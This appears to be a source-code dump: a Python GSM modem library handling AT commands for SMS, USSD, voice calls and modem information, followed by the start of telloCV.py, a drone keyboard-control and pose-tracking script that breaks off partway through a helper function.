if csq:
ss = int(csq.group(1))
return ss if ss != 99 else -1
else:
raise CommandError()
@property
def manufacturer(self):
""" @return: The modem's manufacturer's name """
return self.write('AT+CGMI')[0]
@property
def model(self):
""" @return: The modem's model name """
return self.write('AT+CGMM')[0]
@property
def revision(self):
""" @return: The modem's software revision, or None if not known/supported """
try:
return self.write('AT+CGMR')[0]
except CommandError:
return None
@property
def imei(self):
""" @return: The modem's serial number (IMEI number) """
return self.write('AT+CGSN')[0]
@property
def imsi(self):
""" @return: The IMSI (International Mobile Subscriber Identity) of the SIM card. The PIN may need to be entered before reading the IMSI """
return self.write('AT+CIMI')[0]
@property
def networkName(self):
""" @return: the name of the GSM Network Operator to which the modem is connected """
copsMatch = lineMatching(r'^\+COPS: (\d),(\d),"(.+)",{0,1}\d*$', self.write('AT+COPS?')) # response format: +COPS: mode,format,"operator_name",x
if copsMatch:
return copsMatch.group(3)
@property
def supportedCommands(self):
""" @return: list of AT commands supported by this modem (without the AT prefix). Returns None if not known """
try:
# AT+CLAC responses differ between modems. Most respond with +CLAC: and then a comma-separated list of commands
# while others simply return each command on a new line, with no +CLAC: prefix
response = self.write('AT+CLAC')
if len(response) == 2: # Single-line response, comma separated
commands = response[0]
if commands.startswith('+CLAC'):
commands = commands[6:] # remove the +CLAC: prefix before splitting
return commands.split(',')
elif len(response) > 2: # Multi-line response
return [cmd.strip() for cmd in response[:-1]]
else:
self.log.debug('Unhandled +CLAC response: {0}'.format(response))
return None
except CommandError:
return None
@property
def smsTextMode(self):
""" @return: True if the modem is set to use text mode for SMS, False if it is set to use PDU mode """
return self._smsTextMode
@smsTextMode.setter
def smsTextMode(self, textMode):
""" Set to True for the modem to use text mode for SMS, or False for it to use PDU mode """
if textMode != self._smsTextMode:
if self.alive:
self.write('AT+CMGF={0}'.format(1 if textMode else 0))
self._smsTextMode = textMode
self._compileSmsRegexes()
def _setSmsMemory(self, readDelete=None, write=None):
""" Set the current SMS memory to use for read/delete/write operations """
# Switch to the correct memory type if required
if write != None and write != self._smsMemWrite:
readDel = readDelete or self._smsMemReadDelete
self.write('AT+CPMS="{0}","{1}"'.format(readDel, write))
self._smsMemReadDelete = readDel
self._smsMemWrite = write
elif readDelete != None and readDelete != self._smsMemReadDelete:
self.write('AT+CPMS="{0}"'.format(readDelete))
self._smsMemReadDelete = readDelete
def _compileSmsRegexes(self):
""" Compiles regular expression used for parsing SMS messages based on current mode """
if self._smsTextMode:
if self.CMGR_SM_DELIVER_REGEX_TEXT == None:
self.CMGR_SM_DELIVER_REGEX_TEXT = re.compile(r'^\+CMGR: "([^"]+)","([^"]+)",[^,]*,"([^"]+)"$')
self.CMGR_SM_REPORT_REGEXT_TEXT = re.compile(r'^\+CMGR: ([^,]*),\d+,(\d+),"{0,1}([^"]*)"{0,1},\d*,"([^"]+)","([^"]+)",(\d+)$')
elif self.CMGR_REGEX_PDU == None:
self.CMGR_REGEX_PDU = re.compile(r'^\+CMGR: (\d+),(\d*),(\d+)$')
@property
def smsc(self):
""" @return: The default SMSC number stored on the SIM card """
if self._smscNumber == None:
try:
readSmsc = self.write('AT+CSCA?')
except SmscNumberUnknownError:
pass # Some modems return a CMS 330 error if the value isn't set
else:
cscaMatch = lineMatching(r'\+CSCA:\s*"([^,]+)",(\d+)$', readSmsc)
if cscaMatch:
self._smscNumber = cscaMatch.group(1)
return self._smscNumber
@smsc.setter
def smsc(self, smscNumber):
""" Set the default SMSC number to use when sending SMS messages """
if smscNumber != self._smscNumber:
if self.alive:
self.write('AT+CSCA="{0}"'.format(smscNumber))
self._smscNumber = smscNumber
def waitForNetworkCoverage(self, timeout=None):
""" Block until the modem has GSM network coverage.
This method blocks until the modem is registered with the network
and the signal strength is greater than 0, optionally timing out
if a timeout was specified
@param timeout: Maximum time to wait for network coverage, in seconds
@type timeout: int or float
@raise TimeoutException: if a timeout was specified and reached
@raise InvalidStateException: if the modem is not going to receive network coverage (SIM blocked, etc)
@return: the current signal strength
@rtype: int
"""
block = [True]
if timeout != None:
# Set up a timeout mechanism
def _cancelBlock():
block[0] = False
t = threading.Timer(timeout, _cancelBlock)
t.start()
ss = -1
checkCreg = True
while block[0]:
if checkCreg:
cregResult = lineMatching(r'^\+CREG:\s*(\d),(\d)$', self.write('AT+CREG?', parseError=False)) # example result: +CREG: 0,1
if cregResult:
status = int(cregResult.group(2))
if status in (1, 5):
# 1: registered, home network, 5: registered, roaming
# Now simply check and return network signal strength
checkCreg = False
elif status == 3:
raise InvalidStateException('Network registration denied')
elif status == 0:
raise InvalidStateException('Device not searching for network operator')
else:
# Disable network registration check; only use signal strength
self.log.info('+CREG check disabled due to invalid response or unsupported command')
checkCreg = False
else:
# Check signal strength
ss = self.signalStrength
if ss > 0:
return ss
time.sleep(0.2)
else:
# If this is reached, the timer task has triggered
raise TimeoutException()
def sendSms(self, destination, text, waitForDeliveryReport=False, deliveryTimeout=15):
""" Send an SMS text message
@param destination: the recipient's phone number
@type destination: str
@param text: the message text
@type text: str
@param waitForDeliveryReport: if True, this method blocks until a delivery report is received for the sent message
@type waitForDeliveryReport: boolean
        @param deliveryTimeout: the maximum time in seconds to wait for a delivery report (if "waitForDeliveryReport" is True)
@type deliveryTimeout: int or float
@raise CommandError: if an error occurs while attempting to send the message
@raise TimeoutException: if the operation times out
"""
if self._smsTextMode:
self.write('AT+CMGS="{0}"'.format(destination), timeout=3, expectedResponseTermSeq='> ')
result = lineStartingWith('+CMGS:', self.write(text, timeout=15, writeTerm=chr(26)))
else:
pdus = encodeSmsSubmitPdu(destination, text, reference=self._smsRef)
for pdu in pdus:
self.write('AT+CMGS={0}'.format(pdu.tpduLength), timeout=3, expectedResponseTermSeq='> ')
result = lineStartingWith('+CMGS:', self.write(str(pdu), timeout=15, writeTerm=chr(26))) # example: +CMGS: xx
if result == None:
raise CommandError('Modem did not respond with +CMGS response')
reference = int(result[7:])
self._smsRef = reference + 1
if self._smsRef > 255:
self._smsRef = 0
sms = SentSms(destination, text, reference)
# Add a weak-referenced entry for this SMS (allows us to update the SMS state if a status report is received)
self.sentSms[reference] = sms
if waitForDeliveryReport:
self._smsStatusReportEvent = threading.Event()
if self._smsStatusReportEvent.wait(deliveryTimeout):
self._smsStatusReportEvent = None
else: # Response timed out
self._smsStatusReportEvent = None
raise TimeoutException()
return sms
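    # Hedged usage sketch (not part of the library): "modem" stands for a
    # connected instance of this class, and the number below is a placeholder.
    #
    #   modem.waitForNetworkCoverage(timeout=60)
    #   sms = modem.sendSms('+15550000000', 'Hello', waitForDeliveryReport=True)
    #   print(sms.reference)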
def sendUssd(self, ussdString, responseTimeout=15):
""" Starts a USSD session by dialing the the specified USSD string, or \
sends the specified string in the existing USSD session (if any)
@param ussdString: The USSD access number to dial
        @param responseTimeout: Maximum time to wait for a response, in seconds
@raise TimeoutException: if no response is received in time
@return: The USSD response message/session (as a Ussd object)
@rtype: gsmmodem.modem.Ussd
"""
self._ussdSessionEvent = threading.Event()
try:
cusdResponse = self.write('AT+CUSD=1,"{0}",15'.format(ussdString), timeout=responseTimeout) # Should respond with "OK"
except Exception:
self._ussdSessionEvent = None # Cancel the thread sync lock
raise
# Some modems issue the +CUSD response before the acknowledgment "OK" - check for that
if len(cusdResponse) > 1:
# Look for more than one +CUSD response because of certain modems' strange behaviour
cusdMatches = allLinesMatchingPattern(self.CUSD_REGEX, cusdResponse)
if len(cusdMatches) > 0:
self._ussdSessionEvent = None # Cancel thread sync lock
return self._parseCusdResponse(cusdMatches)
# Wait for the +CUSD notification message
if self._ussdSessionEvent.wait(responseTimeout):
self._ussdSessionEvent = None
return self._ussdResponse
else: # Response timed out
self._ussdSessionEvent = None
raise TimeoutException()
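    # Hedged usage sketch (not part of the library): query a balance over USSD;
    # the code dialed is a placeholder and replies are operator-specific.
    #
    #   response = modem.sendUssd('*100#')
    #   print(response.message)
    #   if response.sessionActive:
    #       response.cancel()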
def dial(self, number, timeout=5, callStatusUpdateCallbackFunc=None):
""" Calls the specified phone number using a voice phone call
@param number: The phone number to dial
@param timeout: Maximum time to wait for the call to be established
        @param callStatusUpdateCallbackFunc: Callback function that is executed if the call's status changes due to
               remote events (e.g. when it is answered, or when the call is ended by the remote party)
@return: The outgoing call
@rtype: gsmmodem.modem.Call
"""
if self._waitForCallInitUpdate:
# Wait for the "call originated" notification message
self._dialEvent = threading.Event()
try:
ret = self.write('ATD{0};'.format(number), timeout=timeout, waitForResponse=self._waitForAtdResponse)
except Exception:
self._dialEvent = None # Cancel the thread sync lock
raise
else:
# Don't wait for a call init update - base the call ID on the number of active calls
self.write('ATD{0};'.format(number), timeout=timeout, waitForResponse=self._waitForAtdResponse)
self.log.debug("Not waiting for outgoing call init update message")
callId = len(self.activeCalls) + 1
callType = 0 # Assume voice
call = Call(self, callId, callType, number, callStatusUpdateCallbackFunc)
self.activeCalls[callId] = call
return call
if self._mustPollCallStatus:
# Fake a call notification by polling call status until the status indicates that the call is being dialed
threading.Thread(target=self._pollCallStatus, kwargs={'expectedState': 0, 'timeout': timeout}).start()
if self._dialEvent.wait(timeout):
self._dialEvent = None
callId, callType = self._dialResponse
call = Call(self, callId, callType, number, callStatusUpdateCallbackFunc)
self.activeCalls[callId] = call
return call
else: # Call establishing timed out
self._dialEvent = None
raise TimeoutException()
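    # Hedged usage sketch (not part of the library): place a voice call, send a
    # DTMF tone once it is answered, then hang up; the number is a placeholder.
    #
    #   call = modem.dial('0123456789')
    #   time.sleep(5)
    #   if call.answered:
    #       call.sendDtmfTone('1')
    #   call.hangup()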
def processStoredSms(self, unreadOnly=False):
""" Process all SMS messages currently stored on the device/SIM card.
Reads all (or just unread) received SMS messages currently stored on the
device/SIM card, initiates "SMS received" events for them, and removes
them from the SIM card.
This is useful if SMS messages were received during a period that
python-gsmmodem was not running but the modem was powered on.
@param unreadOnly: If True, only process unread SMS messages
@type unreadOnly: boolean
"""
states = [Sms.STATUS_RECEIVED_UNREAD]
if not unreadOnly:
states.insert(0, Sms.STATUS_RECEIVED_READ)
for msgStatus in states:
messages = self.listStoredSms(status=msgStatus, delete=True)
for sms in messages:
self.smsReceivedCallback(sms)
def listStoredSms(self, status=Sms.STATUS_ALL, memory=None, delete=False):
""" Returns SMS messages currently stored on the device/SIM card.
The messages are read from the memory set by the "memory" parameter.
@param status: Filter messages based on this read status; must be 0-4 (see Sms class)
@type status: int
@param memory: The memory type to read from. If None, use the current default SMS read memory
@type memory: str or None
@param delete: If True, delete returned messages from the device/SIM card
@type delete: bool
@return: A list of Sms objects containing the messages read
@rtype: list
"""
self._setSmsMemory(readDelete=memory)
messages = []
delMessages = set()
if self._smsTextMode:
            cmglRegex = re.compile(r'^\+CMGL: (\d+),"([^"]+)","([^"]+)",[^,]*,"([^"]+)"$')
for key, val in dictItemsIter(Sms.TEXT_MODE_STATUS_MAP):
if status == val:
statusStr = key
break
else:
raise ValueError('Invalid status value: {0}'.format(status))
result = self.write('AT+CMGL="{0}"'.format(statusStr))
msgLines = []
msgIndex = msgStatus = number = msgTime = None
for line in result:
cmglMatch = cmglRegex.match(line)
if cmglMatch:
# New message; save old one if applicable
if msgIndex != None and len(msgLines) > 0:
msgText = '\n'.join(msgLines)
msgLines = []
messages.append(ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText))
delMessages.add(int(msgIndex))
msgIndex, msgStatus, number, msgTime = cmglMatch.groups()
msgLines = []
else:
if line != 'OK':
msgLines.append(line)
if msgIndex != None and len(msgLines) > 0:
msgText = '\n'.join(msgLines)
msgLines = []
messages.append(ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText))
delMessages.add(int(msgIndex))
else:
cmglRegex = re.compile(r'^\+CMGL:\s*(\d+),(\d+),.*$')
readPdu = False
            result = self.write('AT+CMGL={0}'.format(status), timeout=100)
for line in result:
if not readPdu:
cmglMatch = cmglRegex.match(line)
if cmglMatch:
msgIndex = int(cmglMatch.group(1))
msgStat = int(cmglMatch.group(2))
readPdu = True
else:
try:
smsDict = decodeSmsPdu(line)
except EncodingError:
self.log.debug('Discarding line from +CMGL response: %s', line)
else:
if smsDict['type'] == 'SMS-DELIVER':
sms = ReceivedSms(self, int(msgStat), smsDict['number'], smsDict['time'], smsDict['text'], smsDict['smsc'])
elif smsDict['type'] == 'SMS-STATUS-REPORT':
sms = StatusReport(self, int(msgStat), smsDict['reference'], smsDict['number'], smsDict['time'], smsDict['discharge'], smsDict['status'])
else:
raise CommandError('Invalid PDU type for readStoredSms(): {0}'.format(smsDict['type']))
messages.append(sms)
delMessages.add(msgIndex)
readPdu = False
if delete:
if status == Sms.STATUS_ALL:
# Delete all messages
self.deleteMultipleStoredSms()
else:
for msgIndex in delMessages:
self.deleteStoredSms(msgIndex)
return messages
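    # Hedged example (not part of the library): fetch every unread message from
    # the SIM ("SM") store, deleting each one after it has been read.
    #
    #   unread = modem.listStoredSms(status=Sms.STATUS_RECEIVED_UNREAD,
    #                                memory='SM', delete=True)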
def _handleModemNotification(self, lines):
""" Handler for unsolicited notifications from the modem
This method simply spawns a separate thread to handle the actual notification
(in order to release the read thread so that the handlers are able to write back to the modem, etc)
@param lines The lines that were read
"""
threading.Thread(target=self.__threadedHandleModemNotification, kwargs={'lines': lines}).start()
def __threadedHandleModemNotification(self, lines):
""" Implementation of _handleModemNotification() to be run in a separate thread
@param lines The lines that were read
"""
for line in lines:
if 'RING' in line:
# Incoming call (or existing call is ringing)
self._handleIncomingCall(lines)
return
elif line.startswith('+CMTI'):
# New SMS message indication
self._handleSmsReceived(line)
return
elif line.startswith('+CUSD'):
# USSD notification - either a response or a MT-USSD ("push USSD") message
self._handleUssd(lines)
return
elif line.startswith('+CDSI'):
# SMS status report
self._handleSmsStatusReport(line)
return
else:
# Check for call status updates
for updateRegex, handlerFunc in self._callStatusUpdates:
match = updateRegex.match(line)
if match:
# Handle the update
handlerFunc(match)
return
# If this is reached, the notification wasn't handled
self.log.debug('Unhandled unsolicited modem notification: %s', lines)
def _handleIncomingCall(self, lines):
self.log.debug('Handling incoming call')
ringLine = lines.pop(0)
if self._extendedIncomingCallIndication:
try:
callType = ringLine.split(' ', 1)[1]
except IndexError:
# Some external 3G scripts modify incoming call indication settings (issue #18)
self.log.debug('Extended incoming call indication format changed externally; re-enabling...')
callType = None
try:
# Re-enable extended format of incoming indication (optional)
self.write('AT+CRC=1')
except CommandError:
self.log.warn('Extended incoming call indication format changed externally; unable to re-enable')
self._extendedIncomingCallIndication = False
else:
callType = None
if self._callingLineIdentification and len(lines) > 0:
clipLine = lines.pop(0)
clipMatch = self.CLIP_REGEX.match(clipLine)
if clipMatch:
callerNumber = clipMatch.group(1)
ton = clipMatch.group(2)
#TODO: re-add support for this
callerName = None
#callerName = clipMatch.group(3)
#if callerName != None and len(callerName) == 0:
# callerName = None
else:
callerNumber = ton = callerName = None
else:
callerNumber = ton = callerName = None
call = None
for activeCall in dictValuesIter(self.activeCalls):
if activeCall.number == callerNumber:
call = activeCall
call.ringCount += 1
if call == None:
            callId = len(self.activeCalls) + 1
call = IncomingCall(self, callerNumber, ton, callerName, callId, callType)
self.activeCalls[callId] = call
self.incomingCallCallback(call)
def _handleCallInitiated(self, regexMatch, callId=None, callType=1):
""" Handler for "outgoing call initiated" event notification line """
if self._dialEvent:
if regexMatch:
groups = regexMatch.groups()
                # Set self._dialResponse to (callId, callType)
if len(groups) >= 2:
self._dialResponse = (int(groups[0]) , int(groups[1]))
else:
self._dialResponse = (int(groups[0]), 1) # assume call type: VOICE
else:
self._dialResponse = callId, callType
self._dialEvent.set()
def _handleCallAnswered(self, regexMatch, callId=None):
""" Handler for "outgoing call answered" event notification line """
if regexMatch:
groups = regexMatch.groups()
if len(groups) > 1:
callId = int(groups[0])
self.activeCalls[callId].answered = True
else:
                # Call ID not available for this notification - check for the first outgoing call that has not been answered
for call in dictValuesIter(self.activeCalls):
if call.answered == False and type(call) == Call:
call.answered = True
return
else:
# Use supplied values
self.activeCalls[callId].answered = True
def _handleCallEnded(self, regexMatch, callId=None, filterUnanswered=False):
if regexMatch:
groups = regexMatch.groups()
if len(groups) > 0:
callId = int(groups[0])
else:
# Call ID not available for this notification - check for the first outgoing call that is active
for call in dictValuesIter(self.activeCalls):
if type(call) == Call:
if not filterUnanswered or (filterUnanswered == True and call.answered == False):
callId = call.id
break
if callId and callId in self.activeCalls:
self.activeCalls[callId].answered = False
self.activeCalls[callId].active = False
del self.activeCalls[callId]
def _handleCallRejected(self, regexMatch, callId=None):
""" Handler for rejected (unanswered calls being ended)
Most modems use _handleCallEnded for handling both call rejections and remote hangups.
This method does the same, but filters for unanswered calls only.
"""
return self._handleCallEnded(regexMatch, callId, True)
def _handleSmsReceived(self, notificationLine):
""" Handler for "new SMS" unsolicited notification line """
self.log.debug('SMS message received')
cmtiMatch = self.CMTI_REGEX.match(notificationLine)
if cmtiMatch:
msgMemory = cmtiMatch.group(1)
msgIndex = cmtiMatch.group(2)
sms = self.readStoredSms(msgIndex, msgMemory)
self.deleteStoredSms(msgIndex)
self.smsReceivedCallback(sms)
def _handleSmsStatusReport(self, notificationLine):
""" Handler for SMS status reports """
self.log.debug('SMS status report received')
cdsiMatch = self.CDSI_REGEX.match(notificationLine)
if cdsiMatch:
msgMemory = cdsiMatch.group(1)
msgIndex = cdsiMatch.group(2)
report = self.readStoredSms(msgIndex, msgMemory)
self.deleteStoredSms(msgIndex)
# Update sent SMS status if possible
if report.reference in self.sentSms:
self.sentSms[report.reference].report = report
if self._smsStatusReportEvent:
# A sendSms() call is waiting for this response - notify waiting thread
self._smsStatusReportEvent.set()
else:
# Nothing is waiting for this report directly - use callback
self.smsStatusReportCallback(report)
def readStoredSms(self, index, memory=None):
""" Reads and returns the SMS message at the specified index
@param index: The index of the SMS message in the specified memory
@type index: int
@param memory: The memory type to read from. If None, use the current default SMS read memory
@type memory: str or None
@raise CommandError: if unable to read the stored message
@return: The SMS message
@rtype: subclass of gsmmodem.modem.Sms (either ReceivedSms or StatusReport)
"""
# Switch to the correct memory type if required
self._setSmsMemory(readDelete=memory)
msgData = self.write('AT+CMGR={0}'.format(index))
# Parse meta information
if self._smsTextMode:
cmgrMatch = self.CMGR_SM_DELIVER_REGEX_TEXT.match(msgData[0])
if cmgrMatch:
msgStatus, number, msgTime = cmgrMatch.groups()
msgText = '\n'.join(msgData[1:-1])
return ReceivedSms(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], number, parseTextModeTimeStr(msgTime), msgText)
else:
# Try parsing status report
cmgrMatch = self.CMGR_SM_REPORT_REGEXT_TEXT.match(msgData[0])
if cmgrMatch:
msgStatus, reference, number, sentTime, deliverTime, deliverStatus = cmgrMatch.groups()
if msgStatus.startswith('"'):
msgStatus = msgStatus[1:-1]
if len(msgStatus) == 0:
msgStatus = "REC UNREAD"
return StatusReport(self, Sms.TEXT_MODE_STATUS_MAP[msgStatus], int(reference), number, parseTextModeTimeStr(sentTime), parseTextModeTimeStr(deliverTime), int(deliverStatus))
else:
raise CommandError('Failed to parse text-mode SMS message +CMGR response: {0}'.format(msgData))
else:
cmgrMatch = self.CMGR_REGEX_PDU.match(msgData[0])
if not cmgrMatch:
raise CommandError('Failed to parse PDU-mode SMS message +CMGR response: {0}'.format(msgData))
stat, alpha, length = cmgrMatch.groups()
pdu = msgData[1]
smsDict = decodeSmsPdu(pdu)
if smsDict['type'] == 'SMS-DELIVER':
return ReceivedSms(self, int(stat), smsDict['number'], smsDict['time'], smsDict['text'], smsDict['smsc'])
elif smsDict['type'] == 'SMS-STATUS-REPORT':
return StatusReport(self, int(stat), smsDict['reference'], smsDict['number'], smsDict['time'], smsDict['discharge'], smsDict['status'])
else:
raise CommandError('Invalid PDU type for readStoredSms(): {0}'.format(smsDict['type']))
def deleteStoredSms(self, index, memory=None):
""" Deletes the SMS message stored at the specified index in modem/SIM card memory
@param index: The index of the SMS message in the specified memory
@type index: int
@param memory: The memory type to delete from. If None, use the current default SMS read/delete memory
@type memory: str or None
@raise CommandError: if unable to delete the stored message
"""
self._setSmsMemory(readDelete=memory)
self.write('AT+CMGD={0},0'.format(index))
def deleteMultipleStoredSms(self, delFlag=4, memory=None):
""" Deletes all SMS messages that have the specified read status.
The messages are read from the memory set by the "memory" parameter.
The value of the "delFlag" paramater is the same as the "DelFlag" parameter of the +CMGD command:
1: Delete All READ messages
2: Delete All READ and SENT messages
3: Delete All READ, SENT and UNSENT messages
4: Delete All messages (this is the default)
@param delFlag: Controls what type of messages to delete; see description above.
@type delFlag: int
@param memory: The memory type to delete from. If None, use the current default SMS read/delete memory
@type memory: str or None
        @raise ValueError: if "delFlag" is not in range [1,4]
@raise CommandError: if unable to delete the stored messages
"""
if 0 < delFlag <= 4:
self._setSmsMemory(readDelete=memory)
            self.write('AT+CMGD=1,{0}'.format(delFlag), timeout=100)
else:
raise ValueError('"delFlag" must be in range [1,4]')
def _handleUssd(self, lines):
""" Handler for USSD event notification line(s) """
if self._ussdSessionEvent:
# A sendUssd() call is waiting for this response - parse it
cusdMatches = allLinesMatchingPattern(self.CUSD_REGEX, lines)
if len(cusdMatches) > 0:
self._ussdResponse = self._parseCusdResponse(cusdMatches)
# Notify waiting thread
self._ussdSessionEvent.set()
def _parseCusdResponse(self, cusdMatches):
""" Parses one or more +CUSD notification lines (for USSD)
@return: USSD response object
@rtype: gsmmodem.modem.Ussd
"""
message = None
sessionActive = True
if len(cusdMatches) > 1:
self.log.debug('Multiple +CUSD responses received; filtering...')
# Some modems issue a non-standard "extra" +CUSD notification for releasing the session
for cusdMatch in cusdMatches:
if cusdMatch.group(1) == '2':
# Set the session to inactive, but ignore the message
self.log.debug('Ignoring "session release" message: %s', cusdMatch.group(2))
sessionActive = False
else:
# Not a "session release" message
message = cusdMatch.group(2)
if sessionActive and cusdMatch.group(1) != '1':
sessionActive = False
else:
sessionActive = cusdMatches[0].group(1) == '1'
message = cusdMatches[0].group(2)
return Ussd(self, sessionActive, message)
def _placeHolderCallback(self, *args):
""" Does nothing """
self.log.debug('called with args: {0}'.format(args))
def _pollCallStatus(self, expectedState, callId=None, timeout=None):
""" Poll the status of outgoing calls.
This is used for modems that do not have a known set of call status update notifications.
@param expectedState: The internal state we are waiting for. 0 == initiated, 1 == answered, 2 = hangup
@type expectedState: int
@raise TimeoutException: If a timeout was specified, and has occurred
"""
callDone = False
timeLeft = timeout or 999999
while self.alive and not callDone and timeLeft > 0:
time.sleep(0.5)
if expectedState == 0: # Only call initializing can timeout
timeLeft -= 0.5
try:
clcc = self._pollCallStatusRegex.match(self.write('AT+CLCC')[0])
            except TimeoutException:
                # Can happen if the call was ended during our time.sleep() call
clcc = None
if clcc:
direction = int(clcc.group(2))
if direction == 0: # Outgoing call
# Determine call state
stat = int(clcc.group(3))
if expectedState == 0: # waiting for call initiated
if stat == 2 or stat == 3: # Dialing or ringing ("alerting")
callId = int(clcc.group(1))
callType = int(clcc.group(4))
                            self._handleCallInitiated(None, callId, callType) # if self._dialEvent is None, this does nothing
expectedState = 1 # Now wait for call answer
elif expectedState == 1: # waiting for call to be answered
if stat == 0: # Call active
callId = int(clcc.group(1))
self._handleCallAnswered(None, callId)
expectedState = 2 # Now wait for call hangup
elif expectedState == 2 : # waiting for remote hangup
# Since there was no +CLCC response, the call is no longer active
callDone = True
self._handleCallEnded(None, callId=callId)
elif expectedState == 1: # waiting for call to be answered
# Call was rejected
callDone = True
self._handleCallRejected(None, callId=callId)
if timeLeft <= 0:
raise TimeoutException()
class Call(object):
""" A voice call """
DTMF_COMMAND_BASE = '+VTS='
dtmfSupport = False # Indicates whether or not DTMF tones can be sent in calls
def __init__(self, gsmModem, callId, callType, number, callStatusUpdateCallbackFunc=None):
"""
@param gsmModem: GsmModem instance that created this object
@param number: The number that is being called
"""
self._gsmModem = weakref.proxy(gsmModem)
self._callStatusUpdateCallbackFunc = callStatusUpdateCallbackFunc
# Unique ID of this call
self.id = callId
# Call type (VOICE == 0, etc)
self.type = callType
# The remote number of this call (destination or origin)
self.number = number
# Flag indicating whether the call has been answered or not (backing field for "answered" property)
self._answered = False
# Flag indicating whether or not the call is active
# (meaning it may be ringing or answered, but not ended because of a hangup event)
self.active = True
@property
def answered(self):
return self._answered
@answered.setter
def answered(self, answered):
self._answered = answered
if self._callStatusUpdateCallbackFunc:
self._callStatusUpdateCallbackFunc(self)
def sendDtmfTone(self, tones):
""" Send one or more DTMF tones to the remote party (only allowed for an answered call)
Note: this is highly device-dependent, and might not work
        @param tones: A str containing one or more DTMF tones to play, e.g. "3" or "*123#"
@raise CommandError: if the command failed/is not supported
@raise InvalidStateException: if the call has not been answered, or is ended while the command is still executing
"""
if self.answered:
dtmfCommandBase = self.DTMF_COMMAND_BASE.format(cid=self.id)
toneLen = len(tones)
if len(tones) > 1:
cmd = ('AT{0}{1};{0}' + ';{0}'.join(tones[1:])).format(dtmfCommandBase, tones[0])
else:
cmd = 'AT{0}{1}'.format(dtmfCommandBase, tones)
try:
self._gsmModem.write(cmd, timeout=(5 + toneLen))
except CmeError as e:
if e.code == 30:
# No network service - can happen if call is ended during DTMF transmission (but also if DTMF is sent immediately after call is answered)
raise InterruptedException('No network service', e)
elif e.code == 3:
# Operation not allowed - can happen if call is ended during DTMF transmission
raise InterruptedException('Operation not allowed', e)
else:
raise e
else:
raise InvalidStateException('Call is not active (it has not yet been answered, or it has ended).')
def hangup(self):
""" End the phone call.
Does nothing if the call is already inactive.
"""
if self.active:
self._gsmModem.write('ATH')
self.answered = False
self.active = False
if self.id in self._gsmModem.activeCalls:
del self._gsmModem.activeCalls[self.id]
class IncomingCall(Call):
    """ Represents an incoming call, conveniently allowing access to call meta information and -control """
    CALL_TYPE_MAP = {'VOICE': 0}
def __init__(self, gsmModem, number, ton, callerName, callId, callType):
"""
@param gsmModem: GsmModem instance that created this object
@param number: Caller number
@param ton: TON (type of number/address) in integer format
@param callType: Type of the incoming call (VOICE, FAX, DATA, etc)
"""
if type(callType) == str:
callType = self.CALL_TYPE_MAP[callType]
super(IncomingCall, self).__init__(gsmModem, callId, callType, number)
# Type attribute of the incoming call
self.ton = ton
self.callerName = callerName
# Flag indicating whether the call is ringing or not
self.ringing = True
# Amount of times this call has rung (before answer/hangup)
self.ringCount = 1
def answer(self):
""" Answer the phone call.
@return: self (for chaining method calls)
"""
if self.ringing:
self._gsmModem.write('ATA')
self.ringing = False
self.answered = True
return self
def hangup(self):
""" End the phone call. """
self.ringing = False
super(IncomingCall, self).hangup()
class Ussd(object):
""" Unstructured Supplementary Service Data (USSD) message.
This class contains convenient methods for replying to a USSD prompt
and to cancel the USSD session
"""
def __init__(self, gsmModem, sessionActive, message):
self._gsmModem = weakref.proxy(gsmModem)
# Indicates if the session is active (True) or has been closed (False)
self.sessionActive = sessionActive
self.message = message
def reply(self, message):
""" Sends a reply to this USSD message in the same USSD session
@raise InvalidStateException: if the USSD session is not active (i.e. it has ended)
@return: The USSD response message/session (as a Ussd object)
"""
if self.sessionActive:
return self._gsmModem.sendUssd(message)
else:
raise InvalidStateException('USSD session is inactive')
def cancel(self):
""" Terminates/cancels the USSD session (without sending a reply)
Does nothing if the USSD session is inactive.
"""
if self.sessionActive:
self._gsmModem.write('AT+CUSD=2')
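# --- Hedged usage sketch (illustrative only, not part of the library) --------
# Assumes a connected modem object exposing the methods defined above; how that
# object is constructed and connected is outside the scope of this snippet, and
# the attribute names on the received messages are assumptions.
def _example_drain_stored_sms(modem):
    """ Print and delete every unread SMS still stored on the device/SIM. """
    def _onSms(sms):
        print('From {0}: {1}'.format(sms.number, sms.text))
    modem.smsReceivedCallback = _onSms  # assumes the callback attribute may be reassigned
    modem.processStoredSms(unreadOnly=True)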
|
telloCV.py
|
"""
tellotracker:
Allows manual operation of the drone and demo tracking mode.
Requires mplayer to record/save video.
Controls:
- tab to lift off
- WASD to move the drone
- space/shift to ascend/descend slowly
- Q/E to yaw slowly
- arrow keys to ascend, descend, or yaw quickly
- backspace to land, or P to palm-land
- enter to take a picture
- R to start recording video, R again to stop recording
(video and photos will be saved to a timestamped file in ~/Pictures/)
- Z to toggle camera zoom state
(zoomed-in widescreen or high FOV 4:3)
- T to toggle tracking
@author Leonie Buckley, Saksham Sinha and Jonathan Byrne
@copyright 2018 see license file for details
"""
import time
import datetime
import os
import tellopy
import numpy
import av
import cv2
from pynput import keyboard
from tracker import Tracker
#posenet
import os
import numpy as np
import sys
from tensorflow.lite.python.interpreter import Interpreter
from PIL import Image
import math
import threading
import traceback
frame = None
run_recv_thread = True
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def argmax2d(inp_3d):
"""
Get the x,y positions of the heatmap of each part's argmax()
"""
heatmapPositions = np.zeros(shape=(17,2))
heatmapConf = np.zeros(shape=(17,1))
for i in range(17):
argmax_i = np.unravel_index(inp_3d[:,:,i].argmax(), inp_3d[:,:,i].shape)
max_i = inp_3d[:,:,i].max()
heatmapPositions[i,:] = argmax_i
heatmapConf[i,:] = max_i
return heatmapPositions,heatmapConf
def get_offsetVector(heatmapPositions=None,offsets=None):
allArrays = np.zeros(shape=(17,2))
for idx,el in enumerate(heatmapPositions):
# print(el)
allArrays[idx,0] = offsets[int(el[0]),int(el[1]),idx]
allArrays[idx,1] = offsets[int(el[0]),int(el[1]),17+idx]
return allArrays
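# Hedged sanity-check sketch (never called by this script): shows how the two
# helpers above turn model outputs into pixel keypoints. The 23x17 grid is an
# arbitrary stand-in for real PoseNet output, while the output stride of 32
# matches the value used further down.
def _example_decode_keypoints():
    heatmaps = np.random.rand(23, 17, 17)           # (rows, cols, 17 keypoints)
    offsets = np.random.rand(23, 17, 34)            # 17 y-offset planes, then 17 x-offset planes
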